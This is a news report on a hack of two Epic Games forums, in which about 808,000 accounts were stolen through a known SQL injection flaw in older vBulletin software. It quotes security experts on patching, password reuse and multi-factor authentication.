Epic hack, thousands of salted logins stolen
Pic: Epic Games
A hacker has stolen around 808,000 accounts from two forums run by Epic Games, which makes Unreal Engine.
Over half a million come from the forum for game Unreal Engine. According to breach alert website LeakedSource.com, the breach occurred on 11th August.
The hacker is currently not known, however the hack was carried out using a known SQL injection vulnerability found in older versions of forum software vBulletin, which allowed the hacker to get full access to the database.
The hacker managed to get away with a list of emails addresses, salted passwords, usernames, IP addresses, birth dates, join dates, full post histories and comments including private messages.
Also, Facebook access tokens were stolen from those who logged in using that method.
LeakedSource.com is saying that the type of encryption differs to the one used in other databases suggesting that Epic Games used a different kind of password scrambling algorithm than seen in other breaches, like Dota 2, and more recently, DLH.net.
Breaches like this act as yet another reminder of the dangers of using software that isn't patched to the latest version. The vulnerability which allowed this hack is reportedly well known to hackers.
LeakedSource added the breached data into its database to allow possible victims to see if they have been affected by this hack. The company also included the password hashes.
Epic Games confirmed the hack in a statement on its website, saying that: “If you have been active on these forums since July 2015, we recommend you change your password on any site where you use the same password.”
Commenting on the DOTA2 breach, Barry Scott, CTO, Centrify Corporation, advice still rings true: “ It's disappointing we still see such hacks and it's really important that web developers close wide open doors like this that are letting hackers in. As users, in spite of all the advice we're given, we are often STILL guilty of using the same password for different web accounts.”
Scott went on: “As well as not re-using passwords, users should switch on “multi-factor authentication” if offered by their apps, which will protect them if the password is stolen by requiring another piece of information before allowing a successful login, often by entering a code via their mobile phone.”
Ryan O'Leary, vice president of threat research centre at WhiteHat Security told SCMagazineUK.com:"SQL injection is a really easy avenue for hackers to steal personal information on a large scale from vulnerable databases. SQLi is actually one of the very first skills you learn when trying to attack a site, because of the prevalence of the flaw and ease of exploitation. Our research has found that around six per cent of websites have at least one SQL injection vulnerability. Six per cent may not seem like a large proportion, but when you think of it as six out of every 100 websites you use that have this particularly nasty vulnerability, it suddenly seems a staggeringly large amount. Companies need to run a thorough vulnerability assessment and fix these critical, yet easy-to-exploit, vulnerabilities."